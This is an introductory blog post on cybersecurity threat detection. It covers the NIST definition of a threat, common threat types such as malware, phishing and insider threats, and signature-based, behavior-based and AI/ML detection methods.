What is threat detection?

Threat actors are constantly endangering our cybersecurity by using all kinds of methods and tools. Identifying these threats is difficult and requires strong threat detection capabilities. In this blog, we’ll talk about threat detection: what it is, what threats we’re detecting and how they’re detected.

First, let’s define what we mean by a threat. The U.S. National Institute of Standards and Technology (NIST) defines a cyber threat as:

Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. Also, the potential for a threat-source to successfully exploit a particular information system vulnerability.

In other words, a threat is anything that can disrupt you or your organization’s data or operations. What is threat detection? Threat detection analyzes your system’s behavior to identify threats before they damage your system. This is different from another similar term, threat prevention, which aims to block threats from entering your system in the first place.

Let’s talk about some common threat types.

Types of threats

Malware

Malware, or malicious software, is used by attackers to steal your data, wreak havoc on your system, take control of your device or for some other ploy. Malware can enter your device by:

• Downloads from the internet
• Saving email attachments
• Attackers exploiting system vulnerabilities
• Clicking on malicious links

Once malware gets on your device or servers, attackers can use the information they gather to exploit your data via ransomware — a type of malware where attackers encrypt and/or collect your data and demand money to keep it private. Or they can use your username and password information to dig deeper into your company’s network until they find what they’re looking for.

Social engineering

Social engineering attacks generally try to exploit human nature, whether it’s kindness (like an attacker posing as someone in need) or fear (like threatening something bad will happen). This type of attack is extremely common, and is often used to steal your information or download malware on your computer.

Phishing is a type of social engineering that is a major threat to data security. It’s often easier to steal information or get users to install malware because it requires less technical know how. Phishing could look like:

• A email mimicking your bank requiring to reset your password, but clicking on the link directs you to a look-alike site where attackers can record your username and password.
• A text message saying your package cannot be delivered, and you must click on a link to fix the problem. The link sends you to a malicious website.
• You manage your company’s finances, and you receive an email with an attached invoice from a malicious sender pretending to be a contractor. You download the attachment, which installs malware on your device.

Misconfigurations and vulnerabilities

Sometimes threats aren’t made by attackers — they’re weaknesses in your system. This could be:

• Out-of-date software or operating systems
• Software with known or unknown vulnerabilities that attackers can exploit
• Weak password policies
• Access policies that are too lax; not using least-privilege access principles

Denial of service

A denial of service attack is used to prevent a device from functioning properly.For example, in a distributed DoS attack, an attacker might use a large number of devices to access a website. When the website isn’t able to handle the increased traffic, the server supporting the website shuts down, preventing people from accessing it any further. This can wreak havoc on a company’s operations, especially if their website is a significant source of revenue.

Insider threats

Insider threats are when someone who knows about your system does something that disrupts your cybersecurity. This may be unintentional, like an employee falling for a phishing attack, or intentional, like a disgruntled employee using their inside knowledge to steal information.

Unknown

There are many threats out there, including new ones that haven’t been discovered by Security teams yet. These can be difficult to find, and require advanced detection capabilities.

Threat detection methods

Detecting these threats is not a simple task. Organizations have to deal with threats constantly — it only takes one successful attack to cause significant damage. That’s why is critical to have the right tools in your defense strategy. There are some methods used to spot attacks:

Signature-based detection

Signature-based detection recognizes known components of a threat by referencing a database of known threat signatures. For example, your threat detection software scans your device for code that is known to be part of malware. If it finds this code, your software knows that you have malware on your device.

Behavior-based detection

Behavior-based detection doesn’t look for specific code like signature-based detection does. Instead, it looks for behavior that indicates malware might be on your device. For example, your infected device might use more resources or request access to a strange network location.

Artificial intelligence and machine learning

Artificial intelligence (AI) and machine learning (ML) is used to enhance detection capabilities. With AI/ML, your software can spot threats that aren’t in a database or have unexpected behaviors. This is a powerful tool that works with Security researchers, going above and beyond a human’s ability to spot threats.